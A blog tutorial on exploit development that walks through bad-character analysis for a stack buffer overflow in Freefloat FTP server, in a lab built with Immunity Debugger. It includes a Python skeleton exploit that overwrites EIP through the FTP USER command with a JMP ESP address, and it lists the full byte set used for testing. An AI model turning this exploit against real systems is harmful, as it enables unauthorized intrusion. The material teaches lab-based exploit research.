This blog post will further build on the basic concepts needed for exploit research and development. We will be walking through the bad character analysis process utilizing Freefloat FTP server – Download Link
This tutorial will build upon our previous post “0x0 Exploit Tutorial: Buffer Overflow – Vanilla EIP Overwrite”, so if you have not already performed the tasks laid out in that post, please do so first. For this article, we will step back to an earlier point in the Freefloat exploit process to detail how one would determine the “bad characters”, or characters that will negatively influence the execution of our exploit or shellcode, for a particular program. To follow on successfully with this blog post, you should have the follow setup prepared:
1. VM platform (Virtualbox, Vmware, etc.)
2. Have a Windows 32-bit XP VM and a Kali Linux or Backtrack 5r3 Linux VM
3. Install Immunity debugger, Mona.py, and FreeFloat FTP server on the Windows VM
As previously mentioned, you should have already completed the tutorial (linked above) for the Freefloat FTP server, and should have a baseline exploit to work with. We will be using the (almost) completed skeleton script for our bad character analysis, which has been posted below:
import sys, socket target = sys.argv # EIP control after 230 bytes in buffer # '0x7cb68d7d' - JMP ESP | XP SP3 EN [SHELL32.dll] (C:WINDOWSsystem32SHELL32.dll) buff = 'x90'*230+'x7dx8dxb6x7c'+'x43'*366 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((target,21)) print s.recv(2048) s.send("USER "+buff+"rn") s.close()
At this point, we will go ahead and attach the program in Immunity (CTRL+F1):
We will want to set a breakpoint (F2) at our memory location 0x7c9d30d7:
Run the program (F9), and execute our exploit, and as we can see, we have successfully hit our breakpoint containing our JMP ESP instruction. We can hit F7 to execute the JMP ESP, and you will see that we land in our ‘x43’ C’s, our user controlled memory, which we previously used to store our shellcode.
At this point we have validated that our skeleton exploit is functioning as expected. Our next step will be to replace our ‘x43’ C’s with a listing of every possible character from 0 to 255 in hex format to use in our bad character testing. The characters have been posted below:
"x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10" "x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20" "x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30" "x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40" "x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50" "x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60" "x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70" "x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80" "x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90" "x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0" "xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0" "xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0" "xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0" "xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0" "xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0" "xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff"
As you may notice, ‘x00’ is not listed. This is due to x00 being the hex representation of a null byte, which will immediately terminate the remainder of the shellcode during testing, and is always a bad character.
At this point, we will rerun our exploit, again hitting our breakpoint and stepping into our ‘badchars’ with F7. Now, we will right click the address in the ‘CPU” section of Immunity, and selecting ‘Follow in dump’.
We can start by locating the ’01’ in the hex dump. As we can see it was rendered properly. If we continue along we see that we have ’02’, ’03, ’04’, and so on in order, appearing in order until the point where we should see ‘0A’. As you may notice, our pattern has ceased at ‘0A’ and we can see that this a bad character. We will remove it and resend our buffer, following the same procedure to view the hex dump of our buffer:
This time, we see ‘0D’ has not rendered properly, indicating another bad character. We can repeat this process, removing each bad character in succession until we have successfully rendered all characters in the hex dump.
If you follow the process as detailed, you should determine the list of bad characters(“x00x0ax0d”), with your hex dump appearing as follows:
Now that we have successfully identified our bad characters, you can proceed with your shellcode generation process as usual (referenced in exploit tutorial 0x0 – vanilla EIP overwrite).
If you are looking for additional exploit tutorials check out Offensive Security training, Fuzzy security blog, and Corelan.